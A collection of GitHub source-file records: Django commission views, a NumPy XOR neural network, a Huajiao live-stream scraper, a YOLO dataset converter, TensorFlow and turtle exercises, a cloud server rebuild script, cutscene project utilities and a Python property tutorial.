Comissao.objects.filter(data__lt=data).aggregate(total=Sum('valor_contrato_mes'))['total']\r\n\r\n # Verifica se contratos_total é None e atribui 0 a ele caso seja\r\n contratos_total = contratos_total if contratos_total is not None else 0\r\n\r\n # Calcula a comissão com base na quantidade de contratos do mês\r\n if contratos_mes < 10:\r\n comissao_valor = comissao.valor_contrato_mes + (contratos_total * Decimal('0.05'))\r\n elif 10 <= contratos_mes <= 20:\r\n comissao_valor = (comissao.valor_contrato_mes * 2) + (contratos_total * Decimal('0.05'))\r\n else:\r\n comissao_valor = (comissao.valor_contrato_mes * 3) + (contratos_total * Decimal('0.05'))\r\n\r\n # Armazena o resultado no dicionário\r\n resultados[data] = comissao_valor\r\n\r\n # Retorna o dicionário com os resultados\r\n return resultados\r\n\r\n@login_required_all\r\ndef listar_comissoes(request):\r\n # Agrupa as comissões por mês e soma seus valores\r\n comissoes = Comissao.objects.values('data', 'contrato__vendedor__nome').annotate(\r\n bonus_mensal=Sum('valor_contrato_mes'),\r\n comissao_fixa=Sum('valor_comissao_retroativa')\r\n )\r\n\r\n # Adiciona a soma das duas colunas em uma nova coluna\r\n for comissao in comissoes:\r\n comissao['comissao_total'] = comissao['bonus_mensal'] + comissao['comissao_fixa']\r\n \r\n return render(request, 'listar_comissoes.html', {'comissoes': comissoes})\r\n","repo_name":"kkviana/sinca-comissao","sub_path":"comissao/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8613,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"4794227836","text":"# Universidad Autónoma Chapingo\n# Departamento de Ingeniería Mecánica Agrícola\n# Ingeniería Mecatrónica Agrícola\n# Jym Emmanuel Cocotle Lara\n# 7° 7\n\n# Librerí­as\n# Para vectores y matrices\nimport numpy as np\n# Para graficación\nimport matplotlib.pyplot as plt\n\n# Función tangente sigmoidal\nclass TanSig:\n\tdef __call__(self, x):\n\t\treturn np.tanh(x)\n\n\tdef deriv(self,x,y):\n\t\treturn 1.0 - np.square(y)\n\n# tangente hiperbólica\ndef tanh(x):\n\tt = (np.exp(x) - np.exp(-x))/(np.exp(x)+np.exp(-x))\n\treturn t\n\n\n# Entradas\nP = np.array([[0,0,1,1],\n\t\t\t [0,1,0,1]])\n\n# Valores esperados\nT = np.array([-1,1,1,-1]) # cambiamos 0 por -1\n# Número de entrada de datos\nQ = 4\n# Número de neuronas\nn1 = 34\n# Epsilon: rango de valores iniciales\nep = 1 # parámetro que afectará a W y b iniciales\n\n# Matriz de pesos sinápticos 1\nW1 = 
ep*2*np.random.rand(n1,2)-1\n# Vector de polarización 1\nb1 = ep*2*np.random.rand(n1,1)-1\n\n# Matriz de pesos sinápticos 2\nW2 = ep*2*np.random.rand(1,n1)-1\n# Vector de polarización 2\nb2 = ep*2*np.random.rand(1,1)-1\n\ntotal_epocas = 11000\na2 = np.array(np.zeros((1,Q)))\nerror_cuadratico_medio = np.array(np.zeros((1,total_epocas)))\nalpha = 0.001\n\nfor epocas in range(total_epocas):\n\tsum_error = 0\n\tfor q in range(Q):\n\t\t# Progagación de la entrada a la salida\n\t\ta1 = tanh(np.dot(W1,P[:,q].reshape(-1,1))+b1)\n\t\ta2[:,q] = tanh(np.dot(W2,a1)+b2)\n\n\t\t# Retropropagación de la sensibilidad\n\t\te = T[q]-a2[:,q]\n \n\t\t# Sensibilidad 2\n\t\ts2 = -2*(1-(a2[:,q]**2))*e\n \n\t\t# Sensibilidad 1\n\t\ts1 = (np.diag(1-(a1**2))*W2.T)*s2\n \n\t\t# Actualización de pesos sinapticos (W) y vectores de polarización (b)\n\t\tW2 = W2 - alpha*s2*a1.T\n\t\tb2 = b2 - alpha*s2\n\t\tW1 = W1 - alpha*s1*P[:,q].reshape(-1,1).T\n\t\tb1 = b1 - alpha*s1\n \n\t\t# error cuadrático medio\n\t\tsum_error = e**2 + sum_error\n \n\terror_cuadratico_medio[:,epocas] = sum_error/Q\n\n# Error cuadrático medio\nprint(f\"EQM: {error_cuadratico_medio}\")\n\na_verificacion = np.array(np.zeros((1,Q)))\n\n# Verificamos el resultado\nfor q in range(Q):\n\ta_verificacion[:,q] = tanh(np.dot(W2,tanh(np.dot(W1,P[:,q].reshape(-1,1))+b1))+b2)\n\nprint(f\"Valores esperados: {T}\")\nprint(f\"Valores de NN: {a_verificacion}\")\n\n# Frontera de decisión\n# Gráfica de contorno\nu = np.linspace(-2,2,100)\nv = np.linspace(-2,2,100)\nz = np.array(np.zeros((100,100)))\n\nfor i in range(100):\n\tfor j in range(100):\n\t\tz[i,j] = tanh(np.dot(W2,(tanh(np.dot(W1,[[u[i]],[v[j]]])+b1)))+b2)\n\nx = np.arange(0,total_epocas,1)\n\nfig,(ax1,ax2) = plt.subplots(1,2)\n\nax1.set_title('Error cuadrático medio')\nax1.plot(x,error_cuadratico_medio.reshape(-1,1))\nax1.set(xlabel='#épocas',ylabel='Error')\n\nax2.set_title('Compuerta lógica XOR')\nax2.contour(u, v, z.T, 5, linewidths = np.arange(-0.9, 0, 0.9))\nax2.scatter(P[0][0],P[1][0], marker='o')\nax2.scatter(P[0][1],P[1][1], marker='o')\nax2.scatter(P[0][2],P[1][2], marker='o')\nax2.scatter(P[0][3],P[1][3], marker='o')\n\n# Límites de los ejes\nax2.set_xlim([-0.5,1.5])\nax2.set_ylim([-0.5,1.5])\n\nplt.show()\n","repo_name":"JYMCL98/Git-Inteligencia-Artificial","sub_path":"Practicas/P6.py","file_name":"P6.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23061565743","text":"# -*- coding: utf-8 -*-\n##__author__ =='liam'\n# python3.52\nimport re,time,random\nimport requests,json\nimport tkinter as tk\nfrom tkinter import filedialog\nimport xlsxwriter as wx\nfrom lxml import etree\n\nUSER_AGENTS = [\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n 
\"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\",\n \"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20\",\n \"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52\",\n]\n\nHeaders = {\n # \"Accept\": \"*/*\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"User-Agent\": random.choice(USER_AGENTS)\n}\n\ndef huajiao_get_live_status(url):\n\n xml = requests.get(url,headers = Headers,timeout = 10)\n xml = xml.content.decode('utf-8', 'replace').encode('utf8', 'replace')\n roomId = (re.search('com/user/(\\d+)',url).group(1),0)[re.search('com/user/(\\d+)',url) == None]\n xml = etree.HTML(xml)\n fansNum = xml.xpath('.//ul[@class=\"clearfix\"]/li/p')[1].xpath('string(.)').strip()\n jsonUrl = \"http://webh.huajiao.com/User/getUserFeeds?fmt=jsonp&uid=\"+str(roomId)+\"&_callback=jQuery&_=\"\n jsonXml = requests.get(jsonUrl,headers = Headers,timeout = 10).text\n jsonXml = jsonXml.replace('/**/jQuery(','').replace('});','}')\n jsonXml = json.loads(jsonXml)\n if jsonXml[\"errno\"] == 0:\n videoXML = jsonXml[\"data\"][\"feeds\"]\n for video in videoXML:\n get_Each_video(video,fansNum,roomId,url)\n \ndef get_Each_video(xml,fansNum,roomId,url):\n global LiveData\n userName = xml[\"author\"][\"nickname\"]\n onlineNum = xml[\"feed\"][\"watches\"]\n cateName = str(xml[\"feed\"][\"tags\"])\n roomName = xml[\"feed\"][\"title\"]\n videoDate = xml[\"feed\"][\"publishtime\"]\n numOfReplies = xml[\"feed\"][\"replies\"]\n numOfPraises = xml[\"feed\"][\"praises\"]\n\n info = [videoDate,roomId,userName,onlineNum,cateName,fansNum,numOfPraises,numOfReplies,roomName,url]\n LiveData.append(info)\n\ndef getExcel(data):\n try:\n print(data)\n\n title = ['DateTime', 'roomId', 'userName', 'onlineNum','cateName', 'fansNum', 'numOfPraises','numOfReplies', 'roomName','url']\n file_name = 'Output_Huajiao'+ str((time.time() * 1000))[8:]\n\n workbook = wx.Workbook(file_name + '.xlsx')\n worksheet = workbook.add_worksheet('info')\n for i in range(len(data)):\n for j in range(len(title)):\n if i == 0:\n worksheet.write(i, j, title[j])\n worksheet.write(i + 1, j, data[i][j])\n\n workbook.close()\n print('\\n File ' + file_name + ' Done!')\n except Exception as err:\n print(err)\n\n\ndef main():\n print('*' * 40)\n print('## Python 3.52')\n print('## Author Liam')\n print('## Date 02/28/2017')\n print('## Huajiao Online Data')\n print('*' * 40)\n\n print('\\r\\n请选择账户信息文件')\n dialog = tk.Tk()\n dialog.withdraw()\n filename = filedialog.askopenfilename()\n if 
filename is None or filename == '':\n sys.exit(0)\n # filename = './test.txt'\n print(filename)\n f = open(filename, 'rb')\n task_lines = [i for i in f.readlines()]\n f.close()\n\n global LiveData\n LiveData = []\n count = 0\n try:\n for line in task_lines:\n try:\n count += 1\n line = str(line, encoding='utf-8')\n line = line.strip()\n if not line and re.search('.*?huajiao.*?',line):\n continue\n\n huajiao_get_live_status(line)\n waitTime = random.uniform(2, 4)\n time.sleep(waitTime)\n except Exception as err:\n print(err)\n getExcel(LiveData)\n except Exception as err:\n print(err)\n finally:\n print(\"Done\")\n\nif __name__ == '__main__':\n main()","repo_name":"LiamBao/Spiders","sub_path":"LivePlatformIndex/HuajiaoOnlineCount.py","file_name":"HuajiaoOnlineCount.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70480568254","text":"\"\"\"Script to covert a yolo formated dataset into a folder like structured dataset for classification\"\"\"\nimport argparse\nimport os\nimport shutil\nimport yaml\nfrom typing import Dict\n\n\ndef cli():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-i\",\n \"--input\",\n help=\"input directory to read data from.\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n help=\"output directory to save processed data.\",\n type=str,\n required=True,\n )\n return parser.parse_args()\n\n\ndef get_class_names(path):\n with open(os.path.join(path, \"data.yaml\"), \"r\") as f:\n cfg = yaml.safe_load(f)\n return {i: c for i, c in enumerate(cfg[\"names\"])}\n\n\ndef move_images(input_dir: str, output_dir: str, class_names: Dict[int, str]):\n for file in os.listdir(os.path.join(input_dir, \"labels\")):\n with open(os.path.join(input_dir, \"labels\", file), \"r\") as f:\n for line in f.readlines():\n image_file = file[:-3] + \"jpg\"\n src = os.path.join(input_dir, \"images\", image_file)\n class_name = class_names[int(line[0])]\n if not os.path.exists(os.path.join(output_dir, class_name)):\n os.mkdir(os.path.join(output_dir, class_name))\n dst = os.path.join(output_dir, class_name, image_file)\n shutil.copy(src=src, dst=dst)\n\n\ndef main(input_dir: str, output_dir: str):\n # create output dirs\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n class_names = get_class_names(input_dir)\n\n for dir in os.listdir(os.path.join(input_dir)):\n # for dir in os.walk(os.path.join(input_dir)):\n input_subdir = os.path.join(input_dir, dir)\n if os.path.isdir(input_subdir) and dir in [\"train\", \"valid\", \"test\"]:\n output_subdir = os.path.join(output_dir, dir)\n if not os.path.exists(output_subdir):\n os.mkdir(output_subdir)\n move_images(input_subdir, output_subdir, class_names)\n\n\nif __name__ == \"__main__\":\n args = cli()\n\n print(f\"Converting dataset from {args.input}\")\n main(args.input, args.output)\n print(f\"Saving dataset to {args.output}\")\n","repo_name":"sumitkumarjethani/fall-detection","sub_path":"scripts/convert_yolo_dataset.py","file_name":"convert_yolo_dataset.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"73096351935","text":"'''\r\n작성일 : 2023년 9월 27일\r\n학과 : 컴퓨터공학부\r\n학번 : 202395001\r\n이름 : 구민수\r\n설명 : 터틀 그래픽으로 n각형 도형\r\n 사용자로부터 그리고싶은 도형의 변의 수를 입력받아 도형을 그린다.\r\n'''\r\nimport turtle as t\r\n\r\nt.shape(\"turtle\")\r\n\r\n#팬 이동 - 펜 자국이 남지 않도록 들어서 이동\r\nt.penup()\r\nt.goto(-50, 
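`get_class_names` in the YOLO-conversion script above assumes `names` in `data.yaml` is a list; in some YOLO data files it is already an `{index: name}` mapping. A tolerant sketch handling both shapes (whether a given dataset uses the dict form is an assumption to check):

```python
def get_class_names(path):
    with open(os.path.join(path, "data.yaml"), "r") as f:
        cfg = yaml.safe_load(f)
    names = cfg["names"]
    if isinstance(names, dict):  # already {id: name}
        return {int(i): c for i, c in names.items()}
    return {i: c for i, c in enumerate(names)}
```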
-50)\r\nt.pendown() # 이동을 마치면 팬 다운\r\n\r\n#원하는 도형을 입력받는다.\r\n \r\nfor i in range(5):\r\n pel = int(t.textinput('도형그리기', '몇각형의 도형을 그릴까요? : '))\r\n \r\n for i in range(pel):\r\n t.forward(50)\r\n t.left(360/pel)","repo_name":"westerdif/Data_science","sub_path":"Data_Science_Kms/Chapter5/05_lab_2.py","file_name":"05_lab_2.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23630750921","text":"# -- encoding:utf-8 --\n\n\"\"\"\n文件名:04_Variables2\n日期:Danycym\n作者:2019/5/5\n\"\"\"\n\nimport tensorflow as tf\n\n# 创建一个变量\nw1 = tf.Variable(tf.random_normal([10], stddev=0.5, dtype=tf.float32), name='w1')\n# 基于第一个变量创建第二个变量\na = tf.constant(2, dtype=tf.float32)\nw2 = tf.Variable(w1.initialized_value() * a, name='w2')\n\n# 进行全局初始化\ninit_op = tf.initialize_all_variables()\n\n# 启动图\nwith tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # 运行init_op\n sess.run(init_op)\n\n # 获取值\n #result = sess.run([w1, w2])\n result = sess.run(fetches=[w1, w2])\n print(\"w1 = {}\\nw2 = {}\".format(result[0], result[1]))\n","repo_name":"Day-yong/Tensorflow_study","sub_path":"Tensorflow-basic/05_Variables2.py","file_name":"05_Variables2.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34880185661","text":"from common.globals import project, zone, dnszone, ds_client, compute, SERVER_STATES, SERVER_ACTIONS, PUBSUB_TOPICS\nfrom google.cloud import pubsub_v1\nimport time\n\ndef nuke_rebuild_server(server_name):\n pubsub_topic = PUBSUB_TOPICS.MANAGE_SERVER\n publisher = pubsub_v1.PublisherClient()\n topic_path = publisher.topic_path(project, pubsub_topic)\n future = publisher.publish(topic_path, data=b'Server Delete', server_name=server_name,\n action=SERVER_ACTIONS.DELETE)\n print(future.result())\n time.sleep(30)\n pubsub_topic = PUBSUB_TOPICS.MANAGE_SERVER\n publisher = pubsub_v1.PublisherClient()\n topic_path = publisher.topic_path(project, pubsub_topic)\n future = publisher.publish(topic_path, data=b'Server Build', server_name=server_name, action=SERVER_ACTIONS.BUILD)","repo_name":"emerginganalytics/cyberarena","sub_path":"admin_scripts/nuke_rebuild_server.py","file_name":"nuke_rebuild_server.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"55331316843","text":"import uuid\nimport base64\nfrom typing import Optional\n\nparamHelp = {\n\"CUTSCENEPROJECT\": (\"Create a New Project\", \"Edit Project\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"author\", \"Author\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"genre\", \"Genre\", \"shortStr\")]),\n\"LEVEL\": (\"Add Level\", \"Edit Level\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"img\", \"Map\", \"mapImg\")]),\n\"SUBLEVEL\": (\"Add Sublevel\", \"Add Sublevel\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"img\", \"Map\", \"mapImg\")]),\n\"SCENE\": (\"Add Scene\", \"Edit Scene\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"img\", \"Map\", \"mapImg\")]),\n\"CHARACTER\": (\"Create Character\", \"Edit Character\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"entityType\", \"Character Type\", [\"PLAYER\", \"ENEMY\", \"OTHER\"]),\n (\"img\", 
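The TensorFlow snippet above calls `tf.initialize_all_variables()`, which was deprecated in TF 0.12 and later removed; on the TF 1.x API the supported spelling is `tf.global_variables_initializer()`. A sketch of the updated session setup:

```python
init_op = tf.global_variables_initializer()

with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
    sess.run(init_op)
    w1_val, w2_val = sess.run([w1, w2])
    print("w1 = {}\nw2 = {}".format(w1_val, w2_val))
```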
\"Character Image\", \"charImg\")]),\n\"OBJECT\": (\"Create Object\", \"Edit Object\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"entityType\", \"Object Type\", [\"RESPONSIVE\", \"NON-RESPONSIVE\"]),\n (\"img\", \"Object Image\", \"charImg\")]),\n\"ACTION\": (\"Add Action\", \"Edit Action\",\n [(\"description\", \"Description\", \"Str\")]),\n\"ANIMATION\": (\"Create Animation\", \"Edit Animation\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\")]),\n\"TRANSITION\": (\"Add Transistion\", \"Edit Transistion\",\n [(\"description\", \"Description\", \"Str\")]),\n\"ACT\": (\"Add Act\", \"Edit Act\",\n [(\"description\", \"Description\", \"Str\")]),\n\"HEADING\": (\"Add Heading\", \"Edit Heading\",\n [(\"description\", \"Description\", \"Str\")]),\n\"DIALOGUE\": (\"Add Dialogue\", \"Edit Dialogue\",\n [(\"character_name\", \"Character\", \"shortStr\"),\n (\"dialogue\", \"Dialogue\", \"Str\"),\n (\"paranthetical\", \"Paranthetical\", \"Str\")]),\n\"EVENT\": (\"Create Event\", \"Edit Event\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\")]),\n\"OBJECTIVE\": (\"Add Objective\", \"Edit Objective\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\")]),\n\"PHYSICS\": (\"Add Physics\", \"Edit Physics\",\n [(\"description\", \"Description\", \"Str\")]),\n\"PSEUDOCODE\": (\"Add Pseudocode\", \"Edit Pseudocode\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"purpose\", \"Purpose\", \"Str\"),\n (\"pscode\", \"Pseudocode\", \"Str\")]),\n\"CONTROL\": (\"Add Control\", \"Edit Control\", []),\n\"SIGNAL\": (\"Add Physics\", \"Edit Physics\", []),\n}\n\n# Global registry, all instantiable items with an ID give their id and a reference to themselves into this dict\nglobal REGISTRY\nREGISTRY = {}\n\nclass OrderedInstanceHolder(object):\n \"\"\" Helper class for classes that need to store instances in a specific order.\n classes that use this (not limited to): LevelWrapper, Animation, Scene\n\n init:\n None\n\n methods:\n get: get a list of the instances\n addNew: add a new instance to the end of the list\n item: instance to add to the list\n remove: remove instance from list at a given index\n index: int\n moveUp: move instance at index one place up the list\n index: int\n moveDown: move instance at index one place down the list\n index: int\n move: move instance from one index to another\n index: int, which item you want\n newIndex: int, where you want the item to go\n \"\"\"\n\n def __init__(self):\n self.__ordered_holder = []\n\n def get(self) -> list:\n return self.__ordered_holder\n\n def addNew(self, item):\n self.__ordered_holder.append(item)\n\n def remove(self,\n index: int):\n assert type(index) is int\n del self.__ordered_holder[index]\n\n def removeByID(self,\n itemID: int):\n assert type(itemID) is int\n for index, item in enumerate(self.__ordered_holder):\n if item.id == itemID: \n self.remove(index)\n break\n\n def __elementSwap(self,\n index1: int,\n index2: int):\n \"\"\"Elementwise swap of two items at specified indexes\"\"\"\n self.__ordered_holder[index1], self.__ordered_holder[index2] = self.__ordered_holder[index2], self.__ordered_holder[index1]\n\n def moveUp(self,\n index: int):\n assert type(index) is int\n if index == 0:\n raise ValueError(\"Can't move first element of list up\")\n elif 0 > index > len(self.__ordered_holder):\n raise ValueError(\"Index out of range: {}\".format(Index))\n self.__elementSwap(index, index-1)\n\n def 
moveDown(self,\n index: int):\n assert type(index) is int\n if index == len(self.__ordered_holder):\n raise ValueError(\"Can't move last element of list down\")\n elif 0 > index > len(self.__ordered_holder):\n raise ValueError(\"Index out of range: {}\".format(Index))\n self.__elementSwap(index, index+1)\n\n def move(self,\n index: int,\n newIndex: int):\n assert type(index) is int\n assert type(newIndex) is int\n if 0 > index > len(self.__ordered_holder):\n raise ValueError(\"Index out of range: {}\".format(Index))\n if 0 > newIndex > len(self.__ordered_holder)-1:\n raise ValueError(\"newIndex out of range: {}\".format(newIndex))\n item = self.__ordered_holder.pop(index)\n self.__ordered_holder.insert(newIndex, item)\n\nclass Image(object):\n \"\"\" Base class for image support. Stores image data as base64 encoded strings \"\"\"\n def __init__(self,\n img: Optional[str] = None):\n self.img = img\n\n @property\n def img(self) -> str:\n return self.__img\n\n @img.setter\n def img(self, img: str):\n try:\n if not img:\n self.__img = None\n return\n if type(img) is bytes:\n img = img.decode(\"utf-8\")\n base64.b64decode(img)\n assert type(img) is str\n self.__img = img\n except:\n raise\n\nclass CharacterImage(Image):\n def __init__(self, img):\n Image.__init__(self, img)\n\nclass MapImage(Image):\n def __init__(self, img):\n Image.__init__(self, img)\n\nclass Name(object):\n \"\"\"Helper class providing name functionality to other classes\"\"\"\n def __init__(self,\n name: str):\n self.name = name\n\n @property\n def name(self) -> str:\n return self.__name\n\n @name.setter\n def name(self, name: str):\n assert type(name) is str\n self.__name = name\n\nclass Description(object):\n \"\"\"Helper class providing description functionality to other classes\"\"\"\n def __init__(self,\n description: str):\n self.description = description\n\n @property\n def description(self) -> str:\n return self.__description\n\n @description.setter\n def description(self, description: str):\n assert type(description) is str\n self.__description = description\n\nclass NameDescription(Description, Name):\n \"\"\"Helper class providing name and description functionality to other classes\"\"\"\n def __init__(self, \n name: str,\n description: str):\n Description.__init__(self, description)\n Name.__init__(self, name)\n\nclass Instantiable(object):\n \"\"\"Base class for all instantiable objects, providing core functionality\"\"\"\n def __init__(self, itemID, parentID=None, parent=None):\n if not itemID:\n self.itemID = uuid.uuid4().int\n else:\n assert type(itemID) is int\n self.itemID = itemID\n if parent:\n self.parentID = parent.id\n else:\n self.parentID = parentID\n\n self.type = objToDict(self)[\"type\"]\n\n global REGISTRY\n REGISTRY[self.itemID] = self\n\n @property\n def id(self):\n return self.itemID\n\n def edit(self, params):\n \"\"\" Allows any class to update its attributes from a dict \"\"\"\n for key, value in params.items():\n if hasattr(self, key):\n setattr(self, key, value)\n else:\n raise ValueError(\"{} has no attribute {}\".format(self, key))\n\n def dict(self):\n \"\"\"Return a nice dict of the object, including its type\"\"\"\n return objToDict(self)\n\ndef objToDict(obj):\n obj_dict = {}\n obj_dict[\"type\"] = obj.__class__.__name__.upper()\n for key, value in obj.__dict__.items():\n # eg turns \"_Description__description\" to \"description\"\n if \"__\" in key:\n obj_dict[key.split(\"__\",1)[1]] = value\n else:\n obj_dict[key] = value\n return obj_dict\n\ndef getByID(item_id):\n global 
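The bounds checks in `moveUp`/`moveDown`/`move` above can never fire: the chained comparison `0 > index > len(...)` requires `index` to be below 0 and above the length at the same time, and the error message references `Index`, an undefined name that would raise `NameError` if the branch were ever reached. A corrected sketch:

```python
if not 0 <= index < len(self.__ordered_holder):
    raise ValueError("Index out of range: {}".format(index))
```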
REGISTRY\n try:\n return REGISTRY[item_id]\n except KeyError:\n raise\n\n\ndef restoreOrderedHolder(parent, orderedHolder):\n if not orderedHolder:\n return\n for item in orderedHolder:\n # Get the classname of the item\n item_type = item.pop(\"type\")\n # See if the item has any contents eg an animation class with dialogue, act etc\n if \"elements\" in item.keys():\n itemOrderedHolder = item.pop(\"elements\")\n elif \"ordered_holder\" in item.keys():\n itemOrderedHolder = item.pop(\"ordered_holder\")\n else:\n itemOrderedHolder = None\n # Call its parent to init a new instance\n child = parent.new(item_type.upper(), **item)\n # Recurse another level in if there's more contents to this item\n if itemOrderedHolder:\n restoreOrderedHolder(child, itemOrderedHolder)\n # restore scenematrix if item is a scene\n if item_type == \"SCENE\":\n matrix = item.pop(\"sceneMatrix\")\n child.restoreSceneMatrix(matrix)","repo_name":"amanatron/CUT-SCENE","sub_path":"CutScene/cutscene/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7374981553","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 26 11:55:06 2019\n\n@author: Usuario\n\"\"\"\n\n# Importando as bibliotecas necessárias.\nfrom os import path\n\n\n# Estabelece a pasta que contem as figuras.\nimg_dir = path.join(path.dirname(__file__), 'img')\n\n# Estabelece a pasta que contém as músicas\nsnd_dir = path.join(path.dirname(__file__), 'snd')\n\nfnt_dir = path.join(path.dirname(__file__), 'font')\n\n# Dados gerais do jogo.\nWIDTH = 480 # Largura da tela\nHEIGHT = 600 # Altura da tela\nFPS = 60 # Frames por segundo\n\n# Define algumas variáveis com as cores básicas\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\n\n#Estados do init_screen\nINIT = 0\nGAME = 1\nQUIT = 2\n\n","repo_name":"guishas/Asteroids","sub_path":"assets/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"250352297","text":"class Student(object):\n pass\ns=Student()\ns.name='bob'\nprint(s.name)\ndef set_age(self,age):\n self.age=age\n from types import MappingProxyType\n s.set_age=MappingProxyType(set_age,s)\n s.set_age(25)\n s.age\ndef set_score(self,score):\n self.score=score\nStudent.set_score=set_score\nclass Student(object):\n __slots__=('name','age')\ns = Student()\ns.age=100\ns.name='bob'\nclass Student(object):\n\n def get_score(self):\n return self._score\n\n def set_score(self, value):\n if not isinstance(value, int):\n raise ValueError('score must be an integer!')\n if value < 0 or value > 100:\n raise ValueError('score must between 0 ~ 100!')\n self._score = value\nclass Student(object):\n\n @property\n def score(self):\n return self._score\n\n @score.setter\n def score(self, value):\n if not isinstance(value, int):\n raise ValueError('score must be an integer!')\n if value < 0 or value > 100:\n raise ValueError('score must between 0 ~ 100!')\n self._score = value\n#@property的实现比较复杂,我们先考察如何使用。把一个getter方法变成属性,���需要加上@property就可以了,此时,@property本身又创建了另一个装饰器@score.setter,负责把一个setter方法变成属性赋值,于是,我们就拥有一个可控的属性操作:\nclass Student(object):\n\n @property\n def birth(self):\n return self._birth\n\n @birth.setter\n def birth(self, value):\n self._birth = value\n\n @property\n def age(self):\n return 2015 - 
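The `set_age` experiment above tries to bind a function to an instance with `MappingProxyType`, but that type is a read-only mapping wrapper taking a single mapping argument, so the call raises `TypeError`; binding a plain function to one instance is `types.MethodType`'s job. A sketch:

```python
from types import MethodType

def set_age(self, age):
    self.age = age

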